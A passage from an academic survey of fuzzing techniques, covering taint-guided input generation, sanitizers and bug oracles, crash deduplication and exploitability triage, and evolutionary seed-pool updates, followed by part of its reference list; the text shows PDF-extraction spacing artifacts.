Some fuzzers leverage static or dynamic program analysis
techniques for enhancing the effectiveness of fuzzing. The se
techniques usually involve fuzzing in two phases: (i) a cost ly
program analysis for obtaining useful information about th e
PUT, and (ii) test case generation with the guidance from the
previous analysis. This is denoted in the sixth column of Ta-
ble 1 (p. 6). For example, TaintScope [219] uses a fine-graine d
taint analysis to find “hot bytes”, which are the input bytes
that flow into critical system calls or API calls. A similar
idea is presented by other security researchers [75], [110] .
Dowser [97] performs a static analysis during compilation
to find loops that are likely to contain bugs based on a
heuristic. Specifically, it looks for loops containing poin ter
dereferences. It then computes the relationship between
12
input bytes and the candidate loops with a taint analysis.
Finally, Dowser runs dynamic symbolic execution while
making only the critical bytes to be symbolic hence improv-
ing performance. VUzzer [176] and GRT [145] leverage both
static and dynamic analysis techniques to extract control-
and data-flow features from the PUT and use them to guide
input generation.
Angora [56] and RedQueen [23] decrease the cost of
their analysis by first running for each seed with a costly
instrumentation and using this information for generating
inputs which are run with a lighter instrumentation. An-
gora improves upon the “hot bytes” idea by using taint
analysis to associate each path constraint to correspond-
ing bytes. It then performs a search inspired by gradient
descent algorithm to guide its mutations towards solving
these constraints. On the other hand, RedQueen tries to
detect how inputs are used in the PUT by instrumenting all
comparisons and looking for correspondence between their
operands and the given input. Once a match is found, it can
be used to solve a constraint.
5.3.3 PUT Mutation
One of the practical challenges in fuzzing is bypassing a
checksum validation. For example, when a PUT computes
a checksum of an input before parsing it, many test cases
will be rejected by the PUT. To handle this challenge,
TaintScope [219] proposed a checksum-aware fuzzing tech-
nique, which identifies a checksum test instruction with a
taint analysis, and patches the PUT to bypass the checksum
validation. Once they find a program crash, they generate
the correct checksum for the input to generate a test case tha t
crashes the unmodified PUT. Caballero et al. [44] suggested
a technique called stitched dynamic symbolic execution tha t
can generate test cases in the presence of checksums.
T-Fuzz [170] extends this idea to efficiently penetrate
all kind of conditional branches with grey-box fuzzing. It
first builds a set of Non-Critical Checks (NCC), which are
branches that can be transformed without modifying the
program logic. When the fuzzing campaign stops discov-
ering new paths, it picks an NCC, transforms it, and then
restarts a fuzzing campaign on the modified PUT. Finally,
when a crash is found fuzzing a transformed program, T-
Fuzz tries to reconstruct it on the original program using
symbolic execution.
6 I NPUT EVALUATION
After an input is generated, the fuzzer executes the PUT
on the input, and decides what to do with the resulting
execution. This process is called input evaluation . Although
the simplicity of executing a PUT is one of the reasons
that fuzzing is attractive, there are many optimizations an d
design decisions related to input evaluation that effect th e
performance and effectiveness of a fuzzer, and we explore
these considerations in this section.
6.1 Bug Oracles
The canonical security policy used with fuzz testing consid -
ers every program execution terminated by a fatal signal
(such as a segmentation fault) to be a violation. This pol-
icy detects many memory vulnerabilities, since a memoryvulnerability that overwrites a data or code pointer with
an invalid value will usually cause a segmentation fault
or abort when it is dereferenced. In addition, this policy is
efficient and simple to implement, since operating systems
allow such exceptional situations to be trapped by the fuzze r
without any instrumentation.
However, the traditional policy of detecting crashes will
not detect every memory vulnerability that is triggered. Fo r
example, if a stack buffer overflow overwrites a pointer on
the stack with a valid memory address, the program might
run to completion with an invalid result rather than crash-
ing, and the fuzzer would not detect this. To mitigate this,
researchers have proposed a variety of efficient program
transformations that detect unsafe or unwanted program
behaviors and abort the program. These are often called
sanitizers .
6.1.1 Memory and Type Safety
Memory safety errors can be separated into two classes:
spatial and temporal. Informally, spatial memory errors
occur when a pointer is dereferenced outside of the object it
was intended to point to. For example, buffer overflows and
underflows are canonical examples of spatial memory errors.
Temporal memory errors occur when a pointer is accessed
after it is no longer valid. For example, a use-after-free
vulnerability, in which a pointer is used after the memory
it pointed to has been deallocated, is a typical temporal
memory error.
Address Sanitizer (ASan) [192] is a fast memory error
detector that instruments programs at compile time. ASan
can detect spatial and temporal memory errors and has
an average slowdown of only 73%, making it an attractive
alternative to a basic crash harness. ASan employs a shadow
memory that allows each memory address to be quickly
checked for validity before it is dereferenced, which allow s
it to detect many (but not all) unsafe memory accesses, even
if they would not crash the original program. MEDS [101]
improves on ASan by leveraging the large memory space
available on 64-bit platforms to create large chunks of inac -
cessible memory redzones in between allocated objects. These
redzones make it more likely that a corrupted pointer will
point to invalid memory and cause a crash.
SoftBound/CETS [159], [160] is another memory error
detector that instruments programs during compilation.
Rather than tracking valid memory addresses like ASan,
however, SoftBound/CETS associates bounds and temporal
information with each pointer, and can theoretically de-
tect all spatial and temporal memory errors. However, as
expected, this completeness comes with a higher average
overhead of 116% [160]. CaVer [133], TypeSan [96] and
HexType [113] instrument programs during compilation so
that they can detect bad-casting in C++ type casting. Bad
casting occurs when an object is cast to an incompatible type ,
such as when an object of a base class is cast to a derived
type. CaVer has been shown to scale to web browsers, which
have historically contained this type of vulnerability, an d
imposes between 7.6 and 64.6% overhead.
Another class of memory safety protection is Control Flow
Integrity [10], [11] (CFI), which detects control flow transi-
tions at runtime that are not possible in the original progra m.
CFI can be used to detect test cases that have illegally
13
modified the control flow of a program. A recent project
focused on protecting against a subset of CFI violations has
landed in the mainstream gcc andclang compilers [208].
6.1.2 Undefined Behaviors
Languages such as C contain many behaviors that are left
undefined by the language specification. The compiler is
free to handle these constructs in a variety of ways. In
many cases, a programmer may (intentionally or other-
wise) write their code so that it is only correct for some
compiler implementations. Although this may not seem
overly dangerous, many factors can impact how a compiler
implements undefined behaviors, including optimization
settings, architecture, compiler, and even compiler versi on.
Vulnerabilities and bugs often arise when the compiler’s
implementation of an undefined behavior does not match
the programmer’s expectation [220].
Memory Sanitizer (MSan) is a tool that instruments
programs during compilation to detect undefined behav-
iors caused by uses of uninitialized memory in C and
C++ [199]. Similar to ASan, MSan uses a shadow memory
that represents whether each addressable bit is initialize d
or not. Memory Sanitizer has approximately 150% over-
head. Undefined Behavior Sanitizer (UBSan) [71] modifies
programs at compile-time to detect undefined behaviors.
Unlike other sanitizers which focus on one particular sourc e
of undefined behavior, UBSan can detect a wide variety
of undefined behaviors, such as using misaligned pointers,
division by zero, dereferencing null pointers, and integer
overflow. Thread Sanitizer (TSan) [193] is a compile-time
modification that detects data races with a trade-off betwee n
precision and performance. A data race occurs when two
threads concurrently access a shared memory location and
at least one of the accesses is a write. Such bugs can cause
data corruption and can be extremely difficult to reproduce
due to non-determinism.
6.1.3 Input Validation
Testing for input validation vulnerabilities such as XSS
(cross site scripting) and SQL injection vulnerabilities i s a
challenging problem, as it requires understanding the beha v-
ior of the very complicated parsers that power web browsers
and database engines. KameleonFuzz [74] detects successfu l
XSS attacks by parsing test cases with a real web browser,
extracting the Document Object Model tree, and comparing
it against manually specified patterns that indicate a succe ss-
ful XSS attack. μ4SQLi [18] uses a similar trick to detect SQL
injections. Because it is not possible to reliably detect SQ L
injections from a web applications response, μ4SQLi uses a
database proxy that intercepts communication between the
target web application and the database to detect whether
an input triggered harmful behavior.
6.1.4 Semantic Difference
Semantic bugs are often discovered using a technique called
differential testing [148], which compares the behavior of sim-
ilar (but not identical) programs. Several fuzzers [41], [1 71],
[59] have used differential testing to identify discrepanc ies
between similar programs, which are likely to indicate a
bug. Jung et al . [118] introduced black-box differential fuzztesting , which uses differential testing of multiple inputs on
a single program to map mutations from the PUT’s input to
its output. These mappings are used to identify information
leaks.
6.2 Execution Optimizations
Our model considers individual fuzz iterations to be exe-
cuted sequentially. While the straightforward implementa -
tion of such an approach would simply load the PUT every
time a new process is started at the beginning of a fuzz it-
eration, the repetitive loading processes can be significan tly
reduced. To this end, modern fuzzers provide functionaliti es
that skip over these repetitive loading processes. For exam -
ple, AFL [231] provides a fork-server that allows each new
fuzz iteration to fork from an already initialized process.
Similarly, in-memory fuzzing is another way to optimize
the execution speed as discussed in §3.1.2. Regardless of the
exact mechanism, the overhead of loading and initializing
the PUT is amortized over many iterations. Xu et al. [228]
further lower the cost of an iteration by designing a new
system call that replaces fork() .
6.3 Triage
Triage is the process of analyzing and reporting test cases
that cause policy violations. Triage can be separated into
three steps: deduplication, prioritization, and test case mini-
mization.
6.3.1 Deduplication
Deduplication is the process of pruning any test case from
the output set that triggers the same bug as another test
case. Ideally, deduplication would return a set of test case s
in which each triggers a unique bug.
Deduplication is an important component of most
fuzzers for several reasons. As a practical implementation
manner, it avoids wasting disk space and other resources by
storing duplicate results on the hard drive. As a usability
consideration, deduplication makes it easy for users to
understand roughly how many different bugs are present,
and to be able to analyze an example of each bug. This is
useful for a variety of fuzzer users; for example, attackers
may want to look only for “home run” vulnerabilities that
are likely to lead to reliable exploitation.
There are currently three major deduplication implemen-
tations used in practice: stack backtrace hashing, coverag e-
based deduplication, and semantics-aware deduplication.
6.3.1.1 Stack Backtrace Hashing: Stack backtrace
hashing [154] is one of the oldest and most widely used
methods for deduplicating crashes, in which an automated
tool records a stack backtrace at the time of the crash, and
assigns a stack hash based on the contents of that back-
trace. For example, if the program crashed while executing
a line of code in function foo, and had the call stack
main→d→c→b→a→foo (see Fig. 2), then a
stack backtrace hashing implementation with n= 5 would
group that test case with other crashing executions whose
backtrace ended with d→c→b→a→foo.
Stack hashing implementations vary widely, starting
with the number of stack frames that are included in the
hash. Some implementations use one [19], three [154], [225] ,
14
main
d
c
b
a
foo (crashed /bolt)n= 5
Fig. 2: Stack backtrace hashing example.
five [82], [49], or do not have any limit [123]. Implementa-
tions also differ in the amount of information included from
each stack frame. Some implementations will only hash the
function’s name or address, but other implementations will
hash both the name and the offset or line. Neither option
works well all the time, so some implementations [150], [82]
produce two hashes: a major and minor hash. The major
hash is likely to group dissimilar crashes together as it onl y
hashes the function name, whereas the minor hash is more
precise since it uses the function name and line number, and
also includes an unlimited number of stack frames.
Although stack backtrace hashing is widely used, it is
not without its shortcomings. The underlying hypothesis of
stack backtrace hashing is that similar crashes are caused
by similar bugs, and vice versa, but, to the best of our
knowledge, this hypothesis has never been directly tested.
There is some reason to doubt its veracity: some crashes do
not occur near the code that caused the crash. For example,
a vulnerability that causes heap corruption might only cras h
when an unrelated part of the code attempts to allocate
memory, rather than when the heap overflow occurred.
6.3.1.2 Coverage-based Deduplication: AFL [231] is
a popular grey-box fuzzer that employs an efficient source-
code instrumentation to record the edge coverage of each
execution of the PUT, and also measure coarse hit counts
for each edge. As a grey-box fuzzer, AFL primarily uses this
coverage information to select new seed files. However, it
also leads to a fairly unique deduplication scheme as well.
As described by its documentation, AFL considers a crash to
be unique if either (i) the crash covered a previously unseen
edge, or (ii) the crash did notcover an edge that was present
in all earlier crashes.
6.3.1.3 Semantics-aware Deduplication: RETracer
[65] performs crash triage based on the semantics recovered
from a reverse data-flow analysis from each crash. Specif-
ically, RETracer checks which pointer caused the crash by
analyzing a crash dump (core dump), and recursively iden-
tifies which instruction assigned the bad value to it. It even -
tually finds a function that has the maximum frame level,
and “blames” the function. The blamed function can be used
to cluster crashes. The authors showed that their technique
successfully deduped millions of Internet Explorer bugs in to
one. In contrast, stack hashing categorized the same crashe s
into a large number of different groups.6.3.2 Prioritization and Exploitability
Prioritization, a.k.a. the fuzzer taming problem [58], is the
process of ranking or grouping violating test cases accordi ng
to their severity and uniqueness. Fuzzing has traditionall y
been used to discover memory vulnerabilities, and in this
context prioritization is better known as determining the
exploitability of a crash. Exploitability informally describes
the likelihood of an adversary being able to write a prac-
tical exploit for the vulnerability exposed by the test case .
Both defenders and attackers are interested in exploitable
bugs. Defenders generally fix exploitable bugs before non-
exploitable ones, and attackers are interested in exploita ble
bugs for obvious reasons.
One of the first exploitability ranking systems was
Microsoft’s !exploitable [150], which gets its name from
the!exploitable WinDbg command name that it
provides. !exploitable employs several heuristics paired
with a simplified taint analysis [164], [185]. It clas-
sifies each crash on the following severity scale:
EXPLOITABLE >PROBABLY_EXPLOITABLE >UNKNOWN >
NOT_LIKELY_EXPLOITABLE , in which x > y means that x
is more severe than y. Although these classifications are not
formally defined, !exploitable is informally intended to be
conservative and error on the side of reporting something
as more exploitable than it is. For example, !exploitable co n-
cludes that a crash is EXPLOITABLE if an illegal instruction
is executed, based on the assumption that the attacker was
able to coerce control flow. On the other hand, a division by
zero crash is considered NOT_LIKELY_EXPLOITABLE .
Since !exploitable was introduced, other, similar rule-
based heuristics systems have been proposed, including the
exploitable plugin for GDB [82] and Apple’s CrashWran-
gler [19]. However, their correctness has not been system-
atically studied and evaluated yet.
6.3.3 Test case minimization
Another important part of triage is test case minimization .
Test case minimization is the process of identifying the
portion of a violating test case that is necessary to trigger the
violation, and optionally producing a test case that is smal ler
and simpler than the original, but still causes a violation.
Although test case minimization and seed trimming (see 3.3,
p. 8) are conceptually similar in that they aim at reducing th e
size of an input, they are distinct because a minimizer can
leverage a bug oracle.
Some fuzzers use their own implementation and algo-
rithms for this. BFF [49] includes a minimization algorithm
tailored to fuzzing [106] that attempts to minimize the
number of bits that are different from the original seed
file. AFL [231] also includes a test case minimizer, which
attempts to simplify the test case by opportunistically set -
ting bytes to zero and shortening the length of the test case.
Lithium [179] is a general purpose test case minimization
tool that minimizes files by attempting to remove “chunks”
of adjacent lines or bytes in exponentially descending size s.
Lithium was motivated by the complicated test cases pro-
duced by JavaScript fuzzers such as jsfunfuzz [187].
There are also a variety of test case reducers that are
not specifically designed for fuzzing, but can nevertheless
be used for test cases identified by fuzzing. These include
15
format agnostic techniques such as delta debugging [236],
and specialized techniques for specific formats such as C-
Reduce [178] for C/C++ files. Although specialized tech-
niques are obviously limited in the types of files they can re-
duce, they have the advantage that they can be significantly
more efficient than generic techniques, since they have an
understanding of the grammar they are trying to simplify.
7 C ONFIGURATION UPDATING
TheCONFUPDATE function plays a critical role in dis-
tinguishing the behavior of black-box fuzzers from grey-
and white-box fuzzers. As discussed in Algorithm 1, the
CONFUPDATE function can modify the set of configurations
(C) based on the configuration and execution information
collected during the current fuzzing run. In its simplest
form,CONFUPDATE returns the Cparameter unmodified.
Black-box fuzzers do not perform any program introspec-
tion beyond evaluating the bug oracle Obug, and so they
typically leave Cunmodified because they do not have any
information collected that would allow them to modify it1.
In contrast, grey- and white-box fuzzers are distin-
guished by their more sophisticated implementations of the
CONFUPDATE function, which allows them to incorporate
new fuzz configurations, or remove old ones that may
have been superseded. CONFUPDATE enables information
collected during one fuzzing iteration to be used by all
future fuzzing iterations. For example, white-box fuzzers
typically create a new fuzz configuration for every new test
case produced, since they produce relatively few test cases
compared to black- and grey-box fuzzers.
7.1 Evolutionary Seed Pool Update
An Evolutionary Algorithm (EA) is a heuristic-based ap-
proach that involves biological evolution mechanisms such
as mutation, recombination, and selection. In the context o f
fuzzing, an EA maintains a seed pool of promising individ-
uals (i.e., seeds) that evolves over the course of a fuzzing
campaign as new individuals are discovered. Although the
concept of EAs is relatively simple, it forms the basis of
many grey-box fuzzers [231], [7], [216]. The process of
choosing the seeds to be mutated and the mutation process
itself were detailed in §4.3 and§5 respectively.
Arguably, the most important step of an EA is to add
a new configuration to the set of configurations C, which
occurs during the CONFUPDATE step of fuzzing. Most EA-
based fuzzers use node or branch coverage as a fitness
function: if a new node or branch is discovered by a test
case, it is added to the seed pool. As the number of reachable
paths can be orders of magnitude larger than the number of
seeds, the seed pool is intended to be a diverse subselection
of all reachable paths in order to represent the current
exploration of the PUT. Also note that seed pools of differen t
size can have the same coverage (as mentioned in §3.2, p. 7).
A common strategy in EA fuzzers is to refine the fitness
function so that it can detect more subtle and granular indi-
cators of improvements. For example, AFL [231] refines its
fitness function definition by recording the number of times
1. Some fuzzers add violating test cases to the set of seeds. Fo r
example, BFF [49] calls this feature crash recycling.a branch has been taken. STADS [35] presents a statistical
framework inspired by ecology to estimate how many new
configurations will be discovered if the fuzzing campaign
continues. Another common strategy is to measure the
fraction of conditions that are met when complex branch
conditions are evaluated. For example, LAF-INTEL [130]
simply breaks multi-byte comparison into several branches ,
which allows it to detect when a new seed passes an inter-
mediate byte comparison. LibFuzzer [7], Honggfuzz [204],
go-fuzz [215] and Steelix [138] instrument all comparisons ,
and add any test case that makes progress on a comparison
to the seed pool. A similar idea was also released as a
stand-alone instrumentation module for clang [119]. Ad-
ditionally, Steelix [138] checks which input offsets influe nce
comparison instructions. Angora [170] improves the fitness
criteria of AFL by considering the calling context of each
branch taken.
VUzzer [176] is an EA-based fuzzer whose fitness func-
tion relies on the results of a custom program analysis
that determines weights for each basic block. Specifically,
VUzzer first uses a built-in program analysis to classify bas ic
blocks as either normal or error handling (EH). For a normal
block, its weight is inversely proportional to the probabil ity
that a random walk on the CFG containing this block visits it
according to transition probabilities defined by VUzzer. Th is
encourages VUzzer to prefer configurations that exercise
normal blocks deemed rare by the aforementioned random
walk. The weight of EH blocks is negative , and its magnitude
is the ratio of the number of basic blocks compared to the
number of EH blocks exercised by this configuration. These
negative weights are used to discourage the execution of
error handling (EH) blocks, based on the hypothesis that
traversing an EH block signals a lower chance of exercising
a vulnerability since bugs often coincide with unhandled
errors.
7.2 Maintaining a Minset
With the ability to create new fuzzing configurations comes
the risk of creating too many configurations. A common
strategy used to mitigate this risk is to maintain a minset ,
or a minimal set of test cases that maximizes a coverage
metric. Minsetting is also used during PREPROCESS , and is
described in more detail in §3.2.
Some fuzzers use a variant of maintaining a minset that
is specialized for configuration updates. As one example,
rather than completely removing configurations that are not
in the minset, which is what Cyberdyne [92] does, AFL [231]
uses a culling procedure to mark minset configurations as
being favorable . Favorable fuzzing configurations are given
a significantly higher chance of being selected for fuzzing b y
theSCHEDULE function. The author of AFL notes that “this
provides a reasonable balance between queue cycling speed
and test case diversity” [235].
8 R ELATED WORK
The literature on fuzzing had an early bloom in 2007–
2008, when three trade-books on the subject were published
within the two-year period [79], [203], [205]. These books
took a more practical approach by presenting the different
16
tools and techniques available at the time and their usages
on a variety of targets. We note that Takanen et al . [205]
already distinguished among black-, white- and grey-box
fuzzers, although no formal definitions were given. Most
recently, [205] had been revised after a decade. The second
edition [206] contained many updates to include modern
tools such as AFL [231] and ClusterFuzz [61].
We are aware of two fuzzing surveys that are concurrent
to ours [137], [139]. However, the goals of both of these
surveys are more focused than ours, which is to provide
a comprehensive study on recent developments covering
the entire area. In particular, Li et al. [137] provided a thor-
ough review of many recent advances in fuzzing, though
the authors have also decided to focus on the detail of
coverage-based fuzzing and not others. More similar to
ours, Liang et al . [139] proposed an informal model to
describe various fuzzing techniques. However, their model
is not flexible enough to encompass some of the fuzzing
approaches we cover in this paper, such as model inference
(see§5.1.2) and hybrid fuzzing (see §5.3).
Klees et al. [127] recently found that there has been no
coherent way of evaluating fuzzing techniques, which can
hamper our ability to compare the effectiveness of fuzzing
techniques. In addition, they provided several useful guid e-
lines for evaluating fuzzing algorithms. We consider their
work to be orthogonal to ours as the evaluation of fuzzing
algorithms is beyond the scope of this paper.
9 C ONCLUDING REMARKS
As we have set forth in §1, our goal for this paper is
to distill a comprehensive and coherent view of modern
fuzzing literature. To this end, we first present a general-
purpose model fuzzer to facilitate our effort to explain the
many forms of fuzzing in current use. Then, we illustrate a
rich taxonomy of fuzzers using Figure 1 (p. 5) and Table 1
(p. 6). We have explored every stage of our model fuzzer by
discussing the design decisions as well as showcasing the
many achievements by the community at large.
REFERENCES
[1] “Binspector: Evolving a security tool,”
https://blogs.adobe.com/security/2015/05/binspector -evolving-a-security-tool.html.
[2] “Cisco secure development lifecycle,”
https://www.cisco.com/c/en/us/about/security-center /security-programs/secure-development-lifecycle/sdl -process/validate.html.
[3] “dharma,” https://github.com/MozillaSecurity/dharm a.
[4] “The fuzzing project,”
https://fuzzing-project.org/software.html.
[5] “Google chromium security,”
https://www.chromium.org/Home/chromium-security/bug s.
[6] “GPF,” http://www.vdalabs.com/tools/efs gpf.html.
[7] “LibFuzzer,” http://llvm.org/docs/LibFuzzer.html.
[8] “Microsoft Security Development Lifecycle, verificatio n phase,”
https://www.microsoft.com/en-us/sdl/process/verifica tion.aspx.
[9] “Reddit: Iama mayhem, the hacking machine that won darpa ’s
cyber grand challenge. ama!”
https://www.reddit.com/r/IAmA/comments/4x9yn3/iama mayhem the hacking machine that won darpas/.
[10] M. Abadi, M. Budiu, U. Erlingsson, and J. Ligatti, “Cont rol-flow
integrity,” in Proceedings of the ACM Conference on Computer and
Communications Security , 2005, pp. 340–353.
[11] ——, “Control-flow integrity principles, implementati ons, and
applications,” ACM Transactions on Information and Systems
Security , vol. 13, no. 1, pp. 4:1–4:40, 2009.
[12] H. J. Abdelnur, R. State, and O. Festor, “KiF: A stateful s ip
fuzzer,” in Proceedings of the International Conference on Principles ,
2007, pp. 47–56.[13] D. Aitel, “An introduction to SPIKE, the fuzzer creation kit,” in
Proceedings of the Black Hat USA , 2001.
[14] ——, “Sharefuzz,” https://sourceforge.net/projects/ sharefuzz/,
2001.
[15] M. Aizatsky, K. Serebryany, O. Chang, A. Arya, and
M. Whittaker, “Announcing OSS-Fuzz: Continuous fuzzing for
open source software,” Google Testing Blog, 2016.
[16] P . Amini, A. Portnoy, and R. Sears, “sulley,”
https://github.com/OpenRCE/sulley.
[17] S. Anand, E. K. Burke, T. Y. Chen, J. Clark, M. B. Cohen,
W. Grieskamp, M. Harman, M. J. Harrold, and P . Mcminn, “An
orchestrated survey of methodologies for automated softwa re
test case generation,” Journal of Systems and Software , vol. 86,
no. 8, pp. 1978–2001, 2013.
[18] D. Appelt, C. D. Nguyen, L. C. Briand, and N. Alshahwan,
“Automated testing for sql injection vulnerabilities: An i nput
mutation approach,” in Proceedings of the International Symposium
on Software Testing and Analysis , 2014, pp. 259–269.
[19] Apple Inc., “Accessing crashwrangler to analyze crash es for
security implications,” Technical Note TN2334.
[20] A. Arcuri, M. Z. Iqbal, and L. Briand, “Random testing:
Theoretical results and practical implications,” IEEE Transactions
on Software Engineering , vol. 38, no. 2, pp. 258–277, 2012.
[21] Ars Technica, “Pwn2own: The perfect antidote to fanboy s who
say their platform is safe,”
http://arstechnica.com/security/2014/03/pwn2own-the -perfect-antidote-to-fanboys-who-say-their-platform -is-safe/,
2014.
[22] C. Aschermann, P . Jauernig, T. Frassetto, A.-R. Sadeghi , T. Holz,
and D. Teuchert, “NAUTILUS: Fishing for deep bugs with
grammars,” in Proceedings of the Network and Distributed System
Security Symposium , 2019.
[23] C. Aschermann, S. Schumilo, T. Blazytko, R. Gawlik, and
T. Holz, “REDQUEEN: Fuzzing with input-to-state
correspondence,” in Proceedings of the Network and Distributed
System Security Symposium , 2019.
[24] K. W. Y. Au, Y. F. Zhou, Z. Huang, and D. Lie, “PScout:
Analyzing the android permission specification,” in Proceedings
of the ACM Conference on Computer and Communications Securi ty,
2012, pp. 217–228.
[25] T. Avgerinos, A. Rebert, S. K. Cha, and D. Brumley, “Enhan cing
symbolic execution with Veritesting,” in Proceedings of the
International Conference on Software Engineering , 2014, pp.
1083–1094.
[26] A. Avizienis, J.-C. Laprie, B. Randell, and C. Landwehr , “Basic
concepts and taxonomy of dependable and secure computing,”
IEEE Transactions on Dependable and Secure Computing , vol. 1,
no. 1, pp. 11–33, 2004.
[27] D. Babic, L. Martignoni, S. McCamant, and D. Song,
“Statically-directed dynamic automated test generation,” in
Proceedings of the International Symposium on Software Tes ting and
Analysis , 2011, pp. 12–22.
[28] G. Bai, J. Lei, G. Meng, S. S. Venkatraman, P . Saxena, J. Sun,
Y. Liu, and J. S. Dong, “AUTHSCAN: Automatic extraction of
web authentication protocols from implementations.” in
Proceedings of the Network and Distributed System Security
Symposium , 2013.
[29] G. Banks, M. Cova, V . Felmetsger, K. Almeroth, R. Kemmer er,
and G. Vigna, “SNOOZE: Toward a stateful network protocol
fuzzer,” in Proceedings of the International Conference on
Information Security , 2006, pp. 343–358.
[30] O. Bastani, R. Sharma, A. Aiken, and P . Liang, “Synthesizi ng
program input grammars,” in Proceedings of the ACM Conference
on Programming Language Design and Implementation , 2017, pp.
95–110.
[31] I. Beer, “pwn4fun spring 2014–safari–part ii,”
http://googleprojectzero.blogspot.com/2014/11/pwn4f un-spring-2014-safari-part-ii.html,
2014.
[32] B. Beizer, Black-box Testing: Techniques for Functional Testing of
Software and Systems . John Wiley & Sons, 1995.
[33] F. Bellard, “QEMU, a fast and portable dynamic translat or,” in
Proceedings of the USENIX Annual Technical Conference , 2005, pp.
41–46.
[34] D. A. Berry and B. Fristedt, Bandit Problems: Sequential Allocation
of Experiments . Springer Netherlands, 1985.
[35] M. B ̈ ohme, “STADS: Software testing as species discovery, ”
ACM Transactions on Software Engineering and Methodology ,
vol. 27, no. 2, pp. 7:1–7:52, 2018.
17
[36] M. B ̈ ohme, V .-T. Pham, M.-D. Nguyen, and A. Roychoudhur y,
“Directed greybox fuzzing,” in Proceedings of the ACM Conference
on Computer and Communications Security , 2017, pp. 2329–2344.
[37] M. B ̈ ohme, V .-T. Pham, and A. Roychoudhury, “Coverage- based
greybox fuzzing as markov chain,” in Proceedings of the ACM
Conference on Computer and Communications Security , 2016, pp.
1032–1043.
[38] E. Bounimova, P . Godefroid, and D. Molnar, “Billions an d
billions of constraints: Whitebox fuzz testing in producti on,” in
Proceedings of the International Conference on Software En gineering ,
2013, pp. 122–131.
[39] R. S. Boyer, B. Elspas, and K. N. Levitt, “SELECT—a formal
system for testing and debugging programs by symbolic
execution,” ACM SIGPLAN Notices , vol. 10, no. 6, pp. 234–245,
1975.
[40] S. Bratus, A. Hansen, and A. Shubina, “LZfuzz: a fast
compression-based fuzzer for poorly documented protocols ,”
Dartmouth College, Tech. Rep. TR2008-634, 2008.
[41] C. Brubaker, S. Janapa, B. Ray, S. Khurshid, and V . Shmatiko v,
“Using frankencerts for automated adversarial testing of
certificate validation in SSL/TLS implementations,” in
Proceedings of the IEEE Symposium on Security and Privacy , 2014,
pp. 114–129.
[42] D. L. Bruening, “Efficient, transparent, and comprehen sive
runtime code manipulation,” Ph.D. dissertation, Massachu setts
Institute of Technology, 2004.
[43] A. Budi, D. Lo, L. Jiang, and Lucia, “kb-Anonymity: A mod el for
anonymized behavior-preserving test and debugging data,” in
Proceedings of the ACM Conference on Programming Language
Design and Implementation , 2011, pp. 447–457.
[44] J. Caballero, P . Poosankam, S. McCamant, D. Babi ́ c, and D . Song,
“Input generation via decomposition and re-stitching: Fin ding
bugs in malware,” in Proceedings of the ACM Conference on
Computer and Communications Security , 2010, pp. 413–425.
[45] J. Caballero, H. Yin, Z. Liang, and D. Song, “Polyglot: Au tomatic
extraction of protocol message format using dynamic binary
analysis,” in Proceedings of the ACM Conference on Computer and
Communications Security , 2007, pp. 317–329.
[46] C. Cadar, D. Dunbar, and D. Engler, “KLEE: Unassisted an d
automatic generation of high-coverage tests for complex
systems programs,” in Proceedings of the USENIX Symposium on
Operating System Design and Implementation , 2008, pp. 209–224.
[47] Y. Cai and W. Chan, “MagicFuzzer: Scalable deadlock dete ction
for large-scale applications,” in Proceedings of the International
Conference on Software Engineering , 2012, pp. 606–616.
[48] D. Caselden, A. Bazhanyuk, M. Payer, L. Szekeres, S. McCam ant,
and D. Song, “Transformation-aware exploit generation usin g a
HI-CFG,” University of California, Tech. Rep.
UCB/EECS-2013-85, 2013.
[49] CERT, “Basic Fuzzing Framework,”
https://www.cert.org/vulnerability-analysis/tools/b ff.cfm.
[50] ——, “Failure Observation Engine,”
https://www.cert.org/vulnerability-analysis/tools/f oe.cfm.
[51] S. K. Cha, T. Avgerinos, A. Rebert, and D. Brumley, “Unlea shing
mayhem on binary code,” in Proceedings of the IEEE Symposium
on Security and Privacy , 2012, pp. 380–394.
[52] S. K. Cha, M. Woo, and D. Brumley, “Program-adaptive
mutational fuzzing,” in Proceedings of the IEEE Symposium on
Security and Privacy , 2015, pp. 725–741.
[53] H. Chen, Y. Xue, Y. Li, B. Chen, X. Xie, X. Wu, and Y. Liu,
“Hawkeye: Towards a desired directed grey-box fuzzer,” in
Proceedings of the ACM Conference on Computer and
Communications Security , 2018, pp. 2095–2108.
[54] J. Chen, W. Diao, Q. Zhao, C. Zuo, Z. Lin, X. Wang, W. C. Lau ,
M. Sun, R. Yang, and K. Zhang, “IoTFuzzer: Discovering
memory corruptions in IoT through app-based fuzzing,” in
Proceedings of the Network and Distributed System Security
Symposium , 2018.
[55] K. Chen and D. Wagner, “Large-scale analysis of format s tring
vulnerabilities in debian linux,” in Proceedings of the Workshop on
Programming Languages and Analysis for Security , 2007, pp. 75–84.
[56] P . Chen and H. Chen, “Angora: Efficient fuzzing by princi pled
search,” in Proceedings of the IEEE Symposium on Security and
Privacy , 2018, pp. 855–869.
[57] T. Y. Chen, F.-C. Kuo, R. G. Merkel, and T. H. Tse, “Adapti ve
random testing: The ART of test case diversity,” Journal of
Systems and Software , vol. 83, no. 1, pp. 60–66, 2010.[58] Y. Chen, A. Groce, C. Zhang, W.-K. Wong, X. Fern, E. Eide, and
J. Regehr, “Taming compiler fuzzers,” in Proceedings of the ACM
Conference on Programming Language Design and Implementat ion,
2013, pp. 197–208.
[59] Y. Chen, C. Su, C. Sun, S. Su, and J. Zhao, “Coverage-directed
differential testing of jvm implementations,” in Proceedings of the
ACM Conference on Programming Language Design and
Implementation , 2016, pp. 85–99.
[60] V . Chipounov, V . Kuznetsov, and G. Candea, “S2E: A platfo rm
for in-vivo multi-path analysis of software systems,” in
Proceedings of the International Conference on Architectu ral Support
for Programming Languages and Operating Systems , 2011, pp.
265–278.
[61] Chrome Security Team, “Clusterfuzz,”
https://code.google.com/p/clusterfuzz/.
[62] CIFASIS, “Neural fuzzer,” http://neural-fuzzer.org.
[63] P . Comparetti, G. Wondracek, C. Kruegel, and E. Kirda,
“Prospex: Protocol specification extraction,” in Proceedings of the
IEEE Symposium on Security and Privacy , 2009, pp. 110–125.
[64] J. Corina, A. Machiry, C. Salls, Y. Shoshitaishvili, S. Hao ,
C. Kruegel, and G. Vigna, “DIFUZE: Interface aware fuzzing f or
kernel drivers,” in Proceedings of the ACM Conference on Computer
and Communications Security , 2017, pp. 2123–2138.
[65] W. Cui, M. Peinado, S. K. Cha, Y. Fratantonio, and V . P . Kem erlis,
“RETracer: Triaging crashes by reverse execution from part ial
memory dumps,” in Proceedings of the International Conference on
